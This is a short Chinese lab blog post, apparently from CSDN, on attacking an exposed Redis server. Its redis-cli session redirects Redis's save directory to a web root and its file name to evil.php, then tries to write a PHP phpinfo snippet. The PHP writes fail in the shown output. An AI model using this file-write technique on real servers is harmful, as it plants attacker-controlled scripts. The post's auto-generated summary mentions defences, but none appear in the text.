Redis攻击利用

c_404

于 2020-12-08 13:20:46 发布

阅读量131

点赞数

本文链接：https://blog.youkuaiyun.com/weixin_42539095/article/details/110871167

版权

本文详细记录了在Windows Sever 2008和Kali Linux环境中安装Redis的步骤，并展示了通过远程连接进行的恶意配置攻击，包括修改文件路径和设置敏感PHP脚本。重点介绍了发现的漏洞及防范措施。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

环境：

在sever2008和kali中分别安装redis
安装步骤参考：
https://www.runoob.com/redis/redis-install.html
修改redis.windows.conf中bind 0.0.0.0
kali中测试是否连通：
telnet 192.168.13.198 6379

攻击利用：

root@kali:/redis-2.8.17/src# ./redis-cli -h 192.168.13.198
192.168.13.198:6379> CONFIG SET dir C:\JSP\WWW
OK
192.168.13.198:6379> CONFIG SET dbfilename evil.php
OK
192.168.13.198:6379> set x “<?php phpinfo();?>”
(error) ERR syntax error
192.168.13.198:6379> set x “<?php phpinfo();?>"
Invalid argument(s)
192.168.13.198:6379> save
OK
192.168.13.198:6379> 
root@kali:/redis-2.8.17/src# ./redis-cli -h 192.168.13.198
192.168.13.198:6379> CONFIG SET dir C:\JSP\WWW
OK
192.168.13.198:6379> CONFIG SET dbfilename evil.php
OK
192.168.13.198:6379> set x “<?php phpinfo();?>”
(error) ERR syntax error
192.168.13.198:6379> set x "1234"
OK
192.168.13.198:6379> save
OK
192.168.13.198:6379>